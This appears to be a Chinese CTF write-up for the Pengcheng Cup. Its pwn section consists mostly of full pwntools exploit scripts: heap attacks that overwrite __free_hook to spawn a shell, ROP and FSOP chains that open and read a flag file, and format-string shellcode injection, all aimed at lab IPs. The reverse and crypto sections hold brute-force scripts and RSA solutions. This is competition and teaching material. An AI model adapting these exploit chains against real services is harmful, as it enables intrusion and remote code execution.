鹏城杯WriteUp | Pwn、密码、Reverse方向

admin
admin
admin
100990
文章
86
评论
2022年7月7日12:59:57评论326 views字数 24543阅读81分48秒阅读模式

PWN

A_fruit

from pwn import *from z3 import *#p=process('./A_fruit')p=remote("192.168.1.105",8888)
#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')libc=ELF('/glibc/2.33/amd64/lib/libc-2.33.so')context.log_level='debug'def add(size):
p.sendlineafter("5.Exitn",str(1))
p.sendlineafter("size:n",str(size))

def edit(idx,con):
p.sendlineafter("5.Exitn",str(2))
p.sendlineafter("index:n",str(idx))
p.sendafter("content:",con)

def show(idx):
p.sendlineafter("5.Exitn",str(3))
p.sendlineafter("index:n",str(idx))
def delete(idx):
p.sendlineafter("5.Exitn",str(4))
p.sendlineafter("index:n",str(idx))

def myz3(c):
a1 = BitVec('a1', 64)
b1 = BitVec('b1', 64)
b2 = BitVec('b2', 64)
b3 = BitVec('b3', 64)
b4 = BitVec('b4', 64)
b5 = BitVec('b5', 64)
b6 = BitVec('b6', 64)
b7 = BitVec('b7', 64)
b8 = BitVec('b8', 64)
b9 = BitVec('b9', 64)

solver = Solver()

solver.add(b1 == (((((((a1+a1+a1)<<4^a1)&0xffffffff)>>0x15^((a1+a1+a1)<<4^a1))&0xffffffff)<<0x11^(((a1+a1+a1)<<4^a1)&0xffffffff)>>0x15^((a1+a1+a1)<<4)^a1)&0xffffffff))
solver.add(b2 == (((((((b1+b1+b1)<<4^b1)&0xffffffff)>>0x15^((b1+b1+b1)<<4^b1))&0xffffffff)<<0x11^(((b1+b1+b1)<<4^b1)&0xffffffff)>>0x15^((b1+b1+b1)<<4)^b1)&0xffffffff))
solver.add(b3 == (((((((b2+b2+b2)<<4^b2)&0xffffffff)>>0x15^((b2+b2+b2)<<4^b2))&0xffffffff)<<0x11^(((b2+b2+b2)<<4^b2)&0xffffffff)>>0x15^((b2+b2+b2)<<4)^b2)&0xffffffff))
solver.add(b4 == (((((((b3+b3+b3)<<4^b3)&0xffffffff)>>0x15^((b3+b3+b3)<<4^b3))&0xffffffff)<<0x11^(((b3+b3+b3)<<4^b3)&0xffffffff)>>0x15^((b3+b3+b3)<<4)^b3)&0xffffffff))
solver.add(b5 == (((((((b4+b4+b4)<<4^b4)&0xffffffff)>>0x15^((b4+b4+b4)<<4^b4))&0xffffffff)<<0x11^(((b4+b4+b4)<<4^b4)&0xffffffff)>>0x15^((b4+b4+b4)<<4)^b4)&0xffffffff))
solver.add(b6 == (((((((b5+b5+b5)<<4^b5)&0xffffffff)>>0x15^((b5+b5+b5)<<4^b5))&0xffffffff)<<0x11^(((b5+b5+b5)<<4^b5)&0xffffffff)>>0x15^((b5+b5+b5)<<4)^b5)&0xffffffff))
solver.add(b7 == (((((((b6+b6+b6)<<4^b6)&0xffffffff)>>0x15^((b6+b6+b6)<<4^b6))&0xffffffff)<<0x11^(((b6+b6+b6)<<4^b6)&0xffffffff)>>0x15^((b6+b6+b6)<<4)^b6)&0xffffffff))
solver.add(b8 == (((((((b7+b7+b7)<<4^b7)&0xffffffff)>>0x15^((b7+b7+b7)<<4^b7))&0xffffffff)<<0x11^(((b7+b7+b7)<<4^b7)&0xffffffff)>>0x15^((b7+b7+b7)<<4)^b7)&0xffffffff))
solver.add(b9 == (((((((b8+b8+b8)<<4^b8)&0xffffffff)>>0x15^((b8+b8+b8)<<4^b8))&0xffffffff)<<0x11^(((b8+b8+b8)<<4^b8)&0xffffffff)>>0x15^((b8+b8+b8)<<4)^b8)&0xffffffff))
solver.add(c == (((((((b9+b9+b9)<<4^b9)&0xffffffff)>>0x15^((b9+b9+b9)<<4^b9))&0xffffffff)<<0x11^(((b9+b9+b9)<<4^b9)&0xffffffff)>>0x15^((b9+b9+b9)<<4)^b9)&0xffffffff))

if solver.check() == sat:
ans = solver.model().eval(a1)
del solver
return (int((str(ans))))
else:
print("no")

add(0x448)#0add(0x448)#1add(0x438)#2add(0x500)#3add(0x500)#4add(0x500)#5add(0x500)#6add(0x500)#7delete(0)
show(0)

low = myz3(int(p.recvuntil('n',drop=True),16))
high = myz3(int(p.recvuntil('n',drop=True),16))<<32leak_addr = high+lowprint("low:",hex(low))
print("high:",hex(high))
print("leak_addr:",hex(leak_addr))

libc_base = leak_addr - (0x7ffff7fb8c00-0x7ffff7dfd000)
print("libc_base:",hex(libc_base))
free_hook = libc_base + libc.sym['__free_hook']
print("free_hook:",hex(free_hook))
environ = libc_base + libc.sym['environ']

add(0x458)#4delete(2)
show(2)
low = myz3(int(p.recvuntil('n',drop=True),16))
high = myz3(int(p.recvuntil('n',drop=True),16))<<32ori_addr = high+lowmp = libc_base + 0x1BB2D0payload = p64(ori_addr)*2+p64(0)+p64(mp-0x20-5)
edit(0,payload)

add(0x458)
delete(5)#tcdelete(4)
show(5)
low = myz3(int(p.recvuntil('n',drop=True),16))
high = myz3(int(p.recvuntil('n',drop=True),16))<<32heap_addr = high+lowprint("heap_addr:",hex(heap_addr))

edit(4,p64(environ))
add(0x500)#10add(0x500)#11show(11)
low = myz3(int(p.recvuntil('n',drop=True),16))
high = myz3(int(p.recvuntil('n',drop=True),16))<<32stack_addr = high+low#0x00007fffffffdd78print("stack_addr:",hex(stack_addr))
target_addr = stack_addr + 8delete(5)#tcdelete(4)
edit(4,p64(target_addr))
add(0x500)#12add(0x500)#13edit(1,"flagx00")

flag_addr = heap_addr - (0x00005555556056f0-0x555555606000)
tmp_addr = heap_addr - (0x00005555556056f0-0x555555606000) + 0x10pop_rdi_ret = libc_base + 0x0000000000027f12pop_rsi_ret = libc_base + 0x000000000003203apop_rdx_ret = libc_base + 0x00000000000f7021pop_rax_ret = libc_base + 0x000000000003f540syscall = libc_base + 0x0000000000026845payload = p64(pop_rdi_ret) + p64(flag_addr)
payload += p64(pop_rsi_ret) + p64(0)
payload += p64(pop_rax_ret) + p64(2)
payload += p64(syscall)
payload += p64(pop_rdi_ret) + p64(3)
payload += p64(pop_rsi_ret) + p64(tmp_addr)
payload += p64(pop_rdx_ret) + p64(0x100)*2payload += p64(pop_rax_ret) + p64(0)
payload += p64(syscall)
payload += p64(pop_rdi_ret) + p64(1)
payload += p64(pop_rsi_ret) + p64(tmp_addr)
payload += p64(pop_rax_ret) + p64(1)
payload += p64(syscall)
edit(13,payload)

p.sendline('5')
#gdb.attach(p,'''b free#watch *{}'''.format(hex(mp)))#raw_input()p.interactive()





Fruitshop






from pwn import *


import sys




local = 1


binary = "./fruitshop"


local_libc = "./libc-2.31.so"


ip = "192.168.40.10"


port = 29538


remote_libc = "./libc-2.23.so"




def main(ip=ip,port=port):


global p,elf,libc


elf = ELF(binary)


if local:


#context.log_level   = "debug"


#p=process(binary)


p=remote('192.168.1.107',8888)


# p=process(binary,env={'LD_PRELOAD':'./libc-2.23.so'})


#p = process(["./ld-2.31.so", "./fruitshop"], env={"LD_PRELOAD":"./ld-2.31.so"})


libc = ELF(local_libc)


pwn()


else:


p=remote(ip,port)


libc=ELF(remote_libc)


pwn()




def add(fruit,id,content):


p.sendlineafter("> ",'1')


p.sendlineafter(":",fruit)


p.sendlineafter(":",str(id))


p.sendafter(":",content)


def edit(fruit,id,content):


p.sendlineafter("> ",'2')


p.sendlineafter(":",fruit)


p.sendlineafter(":",str(id))




p.sendlineafter("Do~n",str(content))


p.sendlineafter("Re~n",str(1))


p.sendlineafter("Mi~n",str(2))


p.sendlineafter("Fa~n",str(2))


def show(fruit,id):


p.sendlineafter("> ",'3')


p.sendlineafter(":",fruit)


p.sendlineafter(":",str(id))


def delete(fruit,id):


p.sendlineafter("> ",'4')


p.sendlineafter(":",fruit)


p.sendlineafter(":",str(id))




def pwn():


add("Banana",0,'a'*0xdd0)


add("Banana",1,'a'*0xdd0)


add("Banana",2,'a'*0xdd0)


add("Banana",3,'a'*0xdd0)


add("Banana",4,'a'*0xdd0)


add("Apple",0,'a'*0xdd0)#leak libc addr


add("Apple",1,'b'*0xdd0)#padding


show("Apple",0)


delete("Apple",0)


show("Apple",0)




p.recvuntil("Content is")


leak_addr = u64(p.recv(6).ljust(8,'x00'))


print("leak_addr:",hex(leak_addr))


libc_base = leak_addr - (0x7ffff7faebe0-0x00007ffff7dc2000)


print("libc_base:",hex(libc_base))


free_hook = libc_base + libc.sym['__free_hook']


print("free_hook:",hex(free_hook))


system = libc_base + libc.sym['system']


print("system:",hex(system))


bin=libc_base+(0x00007ffff7faf1e0-0x00007ffff7dc2000)


mp=libc_base+(0x7ffff7fae2d0-0x00007ffff7dc2000)


add("Cherry",0,'c'*0x110)




delete("Banana",0)




#add("Cherry",1,'c'*0x110)


edit("Apple",0,p64(bin)*2+p64(mp-0x20)*2)


add("Durian",2,'c'*0x110)




delete("Banana",4)


delete("Banana",3)


delete("Banana",2)


#edit("Banana",2,p64(free_hook)[:6])




p.sendlineafter("> ",'2')


p.sendlineafter(":",'Banana')


p.sendlineafter(":",str(2))




p.sendlineafter("ontent:",p64(free_hook))


add("Banana",2,'/bin/shx00')


add("Banana",3,p64(system))


#gdb.attach(p)


#pause()




delete("Banana",2)




p.interactive()




def cat_flag():


global flag


p.recv()


p.sendline("cat flag")


flag = p.recvuntil('n',drop=True).strip()




def dbg(p,content=''):


if local:


gdb.attach(p,content)


raw_input()




if __name__ == "__main__":


if(len(sys.argv)==3):


ip      = sys.argv[1]


port    = sys.argv[2]


main()






one






from pwn import *


context.log_level ='debug'


context.arch = 'amd64'


elf = ELF("pwn")




def csu(text,edi, rsi, rdx, rip):


payload  = b""


payload += p64(text + elf.sym['__libc_csu_init'] + 90)


payload += p64(0) # rbx


payload += p64(1) #rbp


payload += p64(edi) #r12


payload += p64(rsi) #r13


payload += p64(rdx) #r14


payload += p64(rip) #r15


payload += p64(text + elf.sym['__libc_csu_init'] + 64)


payload += p64(0)*7


return payload




def pwn():


 #p = process("./pwn")


 p = remote('192.168.1.106',9999)


 p.recvuntil("ft:")


 leak_stack = int(p.recvuntil("n",drop=True),16)




 p.sendafter('D'*8,'ame:')


 p.sendafter('G'*8,'ord:')


 p.recvuntil("GGGG")


 leak = u64(p.recvuntil("n",drop=True).ljust(8,b'x00'))


 text = leak - 0x11a0




 pop_r13_r14_r15 = text + 0x153e


 pop_rdi = text + 0x1543


 pop_rsi_r15 = text + 0x1541


 pop_rbp = text + 0x1273


 leave_ret = text + 0x133b


 ret = text + 0x101a




 fake_stack = text + 0x4000 + 0x300


 ret_addr = leak_stack - 0x8


 p.recvline()


 payload = b'%'+str((text + 0x153e)&0xffff).encode()+b'c'


 payload += b'%8$hn'


 payload = payload.ljust(0x10,b'a')


 payload += p64(ret_addr)


 payload += csu(text,0,fake_stack,0x200,text+elf.got['read'])


 payload += p64(pop_rbp)


 payload += p64(fake_stack - 0x8)


 payload += p64(leave_ret)


 p.send(payload)




 payload = p64(pop_rdi)


 payload += p64(text + elf.got['puts'])


 payload += p64(text + elf.symbols['puts'])




 pd = asm('''


xor    esi, esi


push   rsi


movabs rax, 0x67616c662f6e7770


push   rax


movabs rax, 0x2f656d6f682f2f2f


push   rax


push   rsp


pop    rdi


xor    edx, edx


push   2


push   2


pop    rax


syscall


pop rax


syscall


push   rdi


push   rax


pop    rdi


pop    rsi


xor    eax, eax


push   0x50


pop    rdx


syscall


''')




 payload += csu(text,0,text+0x42e0,10,text+elf.got['read'])


 payload += p64(pop_r13_r14_r15)


 payload += p64(0x1000)


 payload += p64(0x7)


 payload += p64(text + 0x44c2)


 payload += p64(pop_rbp)


 payload += p64(1)


 payload += p64(text + 0x1520)


 payload += p64(0)*7


 payload += p64(pop_rdi)


 payload += p64(text+0x4000)


 payload += p64(pop_rsi_r15)


 payload += p64(0x1000)


 payload += p64(text+0x42e8)


 payload += p64(pop_rbp)


 payload += p64(1)


 payload += p64(text+0x1529)


 payload += p64(0)


 payload += p64(0)


 payload += p64(0)


 payload += p64(0)


 payload += p64(text+0x4468)


 payload += pd


 payload += p64(ret)


 p.send(payload)


 sleep(2)


 p.send(p64(0)+p16(0x915))


 p.interactive()


while(1):


 try:


 pwn()


 except:


 pass




rainbow_cat


 




from pwn import*


context(os='linux',arch='amd64')


#context.log_level=True


libc=ELF('./libc-2.33.so')


#p = process(["./ld-2.33.so", "./rainbowcat"],env={"LD_PRELOAD":"./libc-2.33.so"})


p=remote('192.168.1.102',9999)


#p=process('./npuctf_pwn',env={'LD_PRELOAD':'./libc6_2.23.so'})


#p=process('./rainbowcat')


def add(id):


 p.recvuntil('Your choice >> ')


 p.sendline('1')


 p.recvuntil(' want to get? ')


 p.sendline(str(id))


def edit(id,data):


 p.recvuntil('Your choice >> ')


 p.sendline('4')


 p.recvuntil('Which one?')


 p.sendline(str(id))


 p.recvuntil('e the cat: ')


 p.send(str(data))


def delete(id):


 p.recvuntil('Your choice >> ')


 p.sendline('2')


 p.recvuntil(' want to abandon? ')


 p.sendline(str(id))


def show(id):


 p.recvuntil('Your choice >> ')


 p.sendline('3')


 p.recvuntil('Choose a cat to show name: ')


 p.sendline(str(id))




add(0)


add(2)


add(1)


add(1)


add(1)


add(1)


add(1)


add(1)


add(1)


add(1)


add(1)




delete(0)


edit(0,p64(0)+p64(0))


delete(0)




show(0)


p.recv(13)


heap=u64(p.recv(6).ljust(8,'x00'))-0x10


print hex(heap)


chunk=heap+0x7f0




edit(0,p64(chunk^(heap>>12)))


add(0)




add(2)


edit(2,p64(0)+p64(0x21))




#####################


edit(0,p64(0)+p64(0))


chunk=heap+0x7f0+0x20




delete(0)


edit(0,p64(0)+p64(0))


delete(0)




edit(0,p64(chunk^(heap>>12)))


add(0)


add(2)


edit(2,p64(0)+p64(0x21))




################


edit(0,p64(0)+p64(0))




chunk=heap+0x3d0




delete(0)




edit(0,p64(0)+p64(0))


delete(0)




edit(0,p64(chunk^(heap>>12)))


add(0)


add(2)


edit(2,p64(0)+p64(0x421))




delete(1)




show(1)


p.recv(13)


leak=u64(p.recv(6).ljust(8,'x00'))


print hex(leak)




libcbase=leak-(0x7ffff7db1c00-0x00007ffff7bd1000)


###############




edit(2,p64(0)+p64(0x21))


delete(0)


edit(0,p64(0)+p64(0))


delete(0)




edit(0,p64((heap+0x10)^(heap>>12)))


add(0)


add(2)




#edit(2,p64(2))




delete(0)


edit(0,p64(0)+p64(0))


delete(0)


edit(0,p64((heap+0x2c0)^(heap>>12)))




add(0)




add(1)


edit(1,p64((heap+0x2d0)^(heap>>12)))




####




delete(0)


edit(0,p64(0)+p64(0))


delete(0)


edit(0,p64((heap+0x2e0)^(heap>>12)))




add(0)


add(1)


edit(1,p64((heap+0x2f0)^(heap>>12)))




####


delete(0)


edit(0,p64(0)+p64(0))


delete(0)


edit(0,p64((heap+0x300)^(heap>>12)))




add(0)


add(1)


edit(1,p64((heap+0x310)^(heap>>12)))


####


delete(0)


edit(0,p64(0)+p64(0))


delete(0)


edit(0,p64((heap+0x320)^(heap>>12)))




add(0)


add(1)


edit(1,p64((heap+0x330)^(heap>>12)))


####


delete(0)


edit(0,p64(0)+p64(0))


delete(0)


edit(0,p64((heap+0x340)^(heap>>12)))




add(0)


add(1)


addr=libcbase+(0x7ffff7db2640-0x00007ffff7bd1000)-0x10


edit(1,p64((addr)^(heap>>12)))


#edit(1,p64(addr))


####




delete(0)


edit(0,p64(0)+p64(0))


delete(0)


edit(0,p64((heap+0x360)^(heap>>12)))




add(0)


add(1)


addr=libcbase+(0x7ffff7db25d0-0x00007ffff7bd1000)-0x28


#edit(1,p64((addr)^(heap>>12)))


edit(1,p64(addr))


####




edit(2,p64(7))




delete(1)


delete(0)


#delete(1)


#edit(0,p64(heap+0x2b0)+p64(0))


edit(1,p64((heap+0x2b0)^(heap>>12)))




print hex(addr)


print hex(libcbase)




edit(2,p64(0))


add(0)


edit(2,p64(0))




###############




setcontext=libcbase+(0x7ffff7c23974-0x00007ffff7bd1000)


addr=libcbase+(0x7ffff7db4e20-0x00007ffff7bd1000)


io_str=libcbase+(0x7ffff7db3560-0x00007ffff7bd1000)


fake_IO_FILE = p64(0x0707070707070707)+p64(0)


fake_IO_FILE += p64(1) #change _IO_write_base = 1


fake_IO_FILE += p64(0xffffffffffff)     #change _IO_write_ptr = 0xffffffffffff


fake_IO_FILE += p64(0)


fake_IO_FILE += p64(heap+0xf0) #v4


fake_IO_FILE += p64(heap+0xf0+0x26) #v5


fake_IO_FILE = fake_IO_FILE.ljust(0xb0, 'x00')


fake_IO_FILE += p64(0)      #change _mode = 0


fake_IO_FILE = fake_IO_FILE.ljust(0xc0, 'x00')


fake_IO_FILE += p64(addr)+p64(io_str)




read=libcbase+libc.sym['read']


open=libcbase+libc.sym['open']


write=libcbase+libc.sym['write']


pop_rdi=libcbase+0x0000000000028a55


pop_rsi=libcbase+0x000000000002a4cf


pop_rdx=libcbase+0x00000000000c7f32


'''


0x0000000000028a55 : pop rdi ; ret




0x000000000002a4cf : pop rsi ; ret




'''




pay=p64(setcontext)+p64(pop_rdi)*2+p64(3)+p64(pop_rsi)+p64(heap+0x400)+p64(pop_rdx)+p64(0x30)+p64(read)+p64(pop_rdi)+p64(1)+p64(write)+p64(heap+0xf0+0x90)+p64(heap+0xf0+0x90)+p64(0x14)+p64(0)+p64(0x30)*2+'flag.txtx00'


pay=pay.ljust(0xa0,'x00')+p64(heap+0xf0+0x10)+p64(open)


pay=pay.ljust(0xe0,'x00')+p64(heap+0xf0+0x10)*2


#pay=pay.ljust(0x1b0,'x00')+p64(0)+p64(0x21)+p64(0)*2+p64(heap+0xf0+0x100)


payload = fake_IO_FILE +pay


##################1


lenth=len(payload)/0x10


for i in range(lenth):




 num=0x10*i


 addr=heap+0x20+num


 num1=0x10*(i+1)


 delete(0)


 edit(0,p64(0)+p64(0))


 delete(0)


 edit(0,p64((addr)^(heap>>12)))


 add(0)


 add(1)


 edit(1,payload[num:num1])


 #add(0)


edit(2,p64(0)+p64(0))




addr=libcbase+(0x7ffff7db4e20-0x00007ffff7bce000)


delete(0)


edit(0,p64(0)+p64(0))


delete(0)


edit(0,p64((addr)^(heap>>12)))


add(0)


edit(2,p64(0x00000000fbad2887)+p64(0x0707070707070707))


#gdb.attach(p,'b *0x7ffff7dbfdf2nb *0x7ffff7c60c28nb *0x00007ffff7c23974')


#raw_input()




add(1)


p.interactive()






arm_protocol






 


import hashlib


import random


import base64


from pwn import *


# context.log_level = "debug"


String = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890abcdefghijklmnopqrstuvwxyz'




def proof(String):


for a in String:


for i in String:


for j in String:


 for k in String:


 for l in String:


 out = a+i+j+k+l


 hash = hashlib.md5((out).encode()).hexdigest()


 #print out


 # exit(0)


 if hash.startswith("4d8900"):


 print(out)


 return out


out = proof(String)






from pwn import *


context.log_level=True


sh = remote("192.168.1.104",8888)


#sh=process("qemu-arm -L /usr/arm-linux-gnueabi -g 1234 ./arm_protocol",shell=True)


#sh= process('./a.out')




def show(idx):


 sh.recvuntil("Input code>n")


 payload=p32(0x11451400)+p32(int(idx))+p32(0)+p32(int(idx))+p32(0)


 payload=payload.ljust(72,'a')+'x00x01'


 payload=payload.ljust(75,'a')+'AbZXRx00'+'a'




 sh.send(payload)


def add(size):


 sh.recvuntil("Input code>n")                 




 payload=p32(0x11451400)+p32(int(size))+p32(int(size))+p32(0)+p32(0)




 payload=payload.ljust(75,'a')+'AbZXRx00'+'a'




 sh.send(payload)


def change(idx,data):


 sh.recvuntil("Input code>n")


 payload=p32(0x11451400)+p32(int(idx))+p32(0)+p32(int(idx))+str(data)+'/bin/shx00'


 payload=payload.ljust(72,'a')+'x00x00x01'


 payload=payload.ljust(75,'a')+'AbZXRx00'+'a'


 sh.send(payload)


def delete(idx):


 sh.recvuntil("Input code>n")


 payload=p32(0x11451400)+p32(int(idx))+p32(0)+p32(int(idx))+p32(0)


 payload=payload.ljust(72,'a')+'x01x00'


 payload=payload.ljust(75,'a')+'AbZXRx00'+'a'




 sh.send(payload)


add(1)


add(1)


add(1)


#add(0x20)


#change(3,'x00/bin/shx00')


change(0,p32(0)+p32(0x31))


change(1,p32(0)+p32(0x11)+p32(0x00012418)+p32(0x0023020))


show(2)




puts=u32(sh.recv(4))


print hex(puts)




libcbase=puts-0x0005F8B8


print hex(libcbase)


system=libcbase+0x391E4


print hex(system)


#change(0,'x00/bin/shx00')


change(1,p32(0)+p32(0x11)+p32(system)+p32(0x024150+0x28))




show(2)




sh.interactive()














Reverse


























































































































































































































































































maze




 


ida分析了一下,找到l,r,t三个字符,竟然不是4个字符的上下左右


鹏城杯WriteUp | Pwn、密码、Reverse方向




稍微调试了一下,有点像链表结构


鹏城杯WriteUp | Pwn、密码、Reverse方向




数据分析太麻烦了,后来发现终端输入可以进行连续输入,那很简单,直接爆破就行


鹏城杯WriteUp | Pwn、密码、Reverse方向




from pwn import *

context(os='linux', arch='amd64', log_level='CRITICAL')

def ps(cont):

try:

r = process("./maze")       r.recvuntil("plz enter the foot printn> ")


r.sendline(cont)

out =  r.recv(2*len(cont))

# print out

if len(out) >=2*len(cont):

print("good")

if ("fl" in out):

print("flag is "+cont)

raise

return True

else:

print("error")

return False

except:

exit(0)


key=["r","t","l"]

cont=""

def pow(cont):

print(cont)

for i in key:

if ps(cont+i):

pow(cont+i)

else:

pass

pow("")




flag is rrrrtltltlllltlltrtrrr


PCL{rrrrtltltlllltlltrtrrr}


 


rota




 


先是对输入一个换表的base64,ksPhS/34MXifj+Ibtjud2Tikj5HkA7iTpbaNELBebOaIm,然后再进最后的两个加密函数,也是换表base,具体是对下标对应加密,因为是base,我们试试base的规律,3个字符转4个字符,输入3个字符 然后取4个字符密文跟加密后的flag比较前缀,先patch程序读的程序的输出然后进行爆破。


鹏城杯WriteUp | Pwn、密码、Reverse方向




 


patch一下,方便后续爆破它,接收它加密后输出


鹏城杯WriteUp | Pwn、密码、Reverse方向




import itertools,os

key = '0123456789abcdef'

enc = 'ksPhS/34MXifj+Ibtjud2Tikj5HkA7iTpbaNELBebOaIm'

flag = ''

for j in range(0,33):

for i in itertools.product(key, repeat=3):

tmp = ''.join(i)

cache = os.popen(f'echo {(flag + tmp)[:32]}|rota.exe').readlines()[0]

a = len(flag) // 3 * 4

b = (len(flag) // 3 + 1) * 4

if cache[a:b] == enc[a:b]:

flag += tmp

flag = flag[:32]

break

print(flag)




8cdd01062b7e90dd372c3ea9977be53e


鹏城杯WriteUp | Pwn、密码、Reverse方向




baby_re






ciphertext = [119, 9, 40, 44, 106, 83, 126, 123, 33, 87, 113, 123, 112, 93, 125, 127, 41, 82, 44, 127, 39, 3, 126, 125, 119, 87, 47, 125, 33, 6, 44, 127, 112, 0, 126, 123, 115, 24]


key = [0x56, 0x57, 0x58, 0x59]




key[0] ^= 0x47


key[1] ^= 0x32


key[2] ^= 0x11


key[3] ^= 0x12


for i in range(0,len(ciphertext)):


 ciphertext[i] ^= key[i & 3]




print(''.join(chr(i) for i in ciphertext))


 


 












密码




























































































































































































































































































babyrssa


 


先解出 p 和 q


from Crypto.Util.number import *e = 1049a=4513855932190587780512692251070948513905472536079140708186519998265613363916408288602023081671609336332823271976169443708346965729874135535872958782973382975364993581165018591335971709648749814573285241290480406050308656233944927823668976933579733318618949138978777831374262042028072274386196484449175052332019377print(2**e-a)




http://www.factordb.com/index.php




找因p,q 题的for循环构成了个阶乘,威尔逊定理解出flag


from Crypto.Util.number import *p=170229264879724117919007372149468684565431232721075153274808454126426741324966131188484635914814926870341378228417496808202497615585946352638507704855332363766887139815236730403246238633855524068161116748612090155595549964229654262432946553891601975628848891407847198187453488358420350203927771308228162321231q=34211n=p*qc=3303523331971096467930886326777599963627226774247658707743111351666869650815726173155008595010291772118253071226982001526457616278548388482820628617705073304972902604395335278436888382882457685710065067829657299760804647364231959804889954665450340608878490911738748836150745677968305248021749608323124958372559270e = 1049a=1d=inverse(e,p-1)

for i in range(p-q,p):

a=a*i%pm=pow(c,d,p)

m=-m*a%pprint(long_to_bytes(m))




easy rsa






from Crypto.Util.number import *

from gmpy2 import iroot

a={'c':'27455f081e4858790c6503580dad3302ae359c9fb46dc601eee98f05142128404e95377324720adbbdebf428549008bcd1b670f6749592a171b30316ab707004b9999f3b80de32843afdfd30505b1f4166a03cee9fc48902b74b6e850cfd268e6917c5d84e64f7e7cd0e4a30bfe5903fb5d821d27fdc817d9c4536a8e7aea55af266abcae857a8ffff2f741901baba1b44091a137c69c471c123ab0b80e250e055959c468e6e37c005105ecd7c8b48c659024e5e251df3eeff5da7b3d561cd98150da3575a16bee5f2524d2795fd4879487018345c1e96efc085ed45fb5f02c027aee5bca3aad0eb3e23376c0cd18b02fb05a1ff8fb1af0a3ce4bb671599894e', 'p':'bb602e402b68a5cfcc5cfcc63cc82e362e98cb7043817e3421599a4bb8755777c362813742852dad4fec7ec33f1faec04926f0c253f56ab4c4dde6d71627fbc9ef42425b70e5ecd55314e744aa66653103b7d1ba86d1e0e21920a0bfe7d598bd09c3c377a3268928b953005450857c6cfea5bfdd7c16305baed0f0a31ad688bd', 'q':'bb8d1ea24a3462ae6ec28e79f96a95770d726144afc95ffffa19c7c3a3786a6acc3309820ba7b1a28a4f111082e69e558b27405613e115139b38e799c723ab7fdd7be14b330b118ae60e3b44483a4c94a556e810ab94bbb102286d0100d7c20e7494e20e0c1030e016603bd2a06c1f6e92998ab68e2d420faf47f3ee687fb6d1', 'e':'292'}

b={'c':'3a80caebcee814e74a9d3d81b08b1130bed6edde2c0161799e1116ab837424fbc1a234b9765edfc47a9d634e1868105d4458c9b9a0d399b870adbaa2337ac62940ade08daa8a7492cdedf854d4d3a05705db3651211a1ec623a10bd60596e891ccc7b9364fbf2e306404aa2392f5598694dec0b8f7efc66e94e3f8a6f372d833941a2235ebf2fc77c163abcac274836380045b63cc9904d9b13c0935040eda6462b99dd01e8230fdfe2871124306e7bca5b356d16796351db37ec4e574137c926a4e07a2bfe76b9cbbfa4b5b010d678804df3e2f23b4ec42b8c8433fa4811bf1dc231855bea4225683529fad54a9b539fe824931b4fdafab67034e57338217f', 'p':'a9cb9e2eb43f17ad6734356db18ad744600d0c19449fc62b25db7291f24c480217d60a7f87252d890b97a38cc6943740ac344233446eea4084c1ba7ea5b7cf2399d42650b2a3f0302bab81295abfd7cacf248de62d3c63482c5ea8ab6b25cdbebc83eae855c1d07a8cf0408c2b721e43c4ac53262bf9aaf7a000000000000000', 'e':'10001', 'n': '841a5a012c104e600eca17b451d5fd37c063ad347707a2e88f36a07e9ad4687302790466e99f35b11580cbe8b0a212e6709686c464a6393c5895b1f97885f23ea12d2069eb6dc3cb4199fb8c6e80a4a94561c6c3499c3c02d9dc9cf216c0f44dc91701a6d9ec89981f261a139500420a51014492f1da588a26e761439dd5739b32540ca6dc1ec3b035043bc535304a06ccb489f72fcd1aa856e1cffe195039176937f9a16bd19030d1e00095f1fd977cf4f23e47b55650ca4712d1eb089d92df032e5180d05311c938a44decc6070cd01af4c6144cdab2526e5cb919a1828bec6a4f3332bf1fa4f1c9d3516fbb158fd4fbcf8b0e67eff944efa97f5b24f9aa65'}

c={'c':'1bd2a47a5d275ba6356e1e2bd10d6c870693be540e9318c746e807a7672f3a75cc63841170126d7dba52d7f6f9cf0f8dce9705fc1785cc670b2658b05d4b24d8918f95594844bfa920c8ffe73160c2c313b3fdbc4541ec19828165e34afa7d05271cc6fd59d08138b88c11677e6ac3b39cff525dcb19694b0388d895f53805a5e5bd8cfb947080e4855aaf83ebd85a397526f7d76d26031386900cb44a2e4bd121412bcee7a6c1e9af411e234f130e68a428596265d3ec647e50f65cb81393f4bd38389a2b9010fd715582506b9054dc235aced50757462b77a5606f116853af0c1ea3c7cf0d304f885d86081f8bac8b67b0625122f75448c5b6eb8f1cc8a0df', 'n':'c2b17c86a8950f6dafe0a633890e4271cfb20c5ffda2d6b3d035afa655ed05ec16c67b18832ed887f2cea83056af079cc75c2ce43c90cce3ed02c2e07d256f240344f1734adeee6dc2b3b4bbf6dcfc68518d0a74e3e66f1865db95ef4204457e6471903c2321ac97f3b8e3d8d935896e9fc9145a30a3e24e7c320490a9944c1e94d301c8388445532699e6189f4aa6a86f67f1d9b8fb0de4225e005bd27594cd33e36622b2cd8eb2781f0c24d33267d9f29309158942b681aab81f39d1b4a73bd17431b46a89a0e4c2c58b1e24e850355c63b72392600d3fff7a16f6ef80ea515709da3ef1d28782882b0dd2f76bf609590db31979c5d1fd03f75d9d8f1c5069', 'e':'10001'}

d = inverse(int(a['e'],16)//2,(int(a['p'],16)-1)*(int(a['q'],16)-1))

#print(d)

m=(pow(int(a['c'],16),d,int(a['p'],16)*int(a['q'],16)))

print(long_to_bytes(iroot(m,2)[0]))N = 0x841a5a012c104e600eca17b451d5fd37c063ad347707a2e88f36a07e9ad4687302790466e99f35b11580cbe8b0a212e6709686c464a6393c5895b1f97885f23ea12d2069eb6dc3cb4199fb8c6e80a4a94561c6c3499c3c02d9dc9cf216c0f44dc91701a6d9ec89981f261a139500420a51014492f1da588a26e761439dd5739b32540ca6dc1ec3b035043bc535304a06ccb489f72fcd1aa856e1cffe195039176937f9a16bd19030d1e00095f1fd977cf4f23e47b55650ca4712d1eb089d92df032e5180d05311c938a44decc6070cd01af4c6144cdab2526e5cb919a1828bec6a4f3332bf1fa4f1c9d3516fbb158fd4fbcf8b0e67eff944efa97f5b24f9aa65

# pbar = 0xa9cb9e2eb43f17ad6734356db18ad744600d0c19449fc62b25db7291f24c480217d60a7f87252d890b97a38cc6943740ac344233446eea4084c1ba7ea5b7cf2399d42650b2a3f0302bab81295abfd7cacf248de62d3c63482c5ea8ab6b25cdbebc83eae855c1d07a8cf0408c2b721e43c4ac53262bf9aaf7a000000000000000

# ZmodN = Zmod(N)

# kbits = 60

# P.<x> = PolynomialRing(ZmodN)

# f = pbar + x

# x0 = f.small_roots(X=2^kbits, beta=0.4)[0]

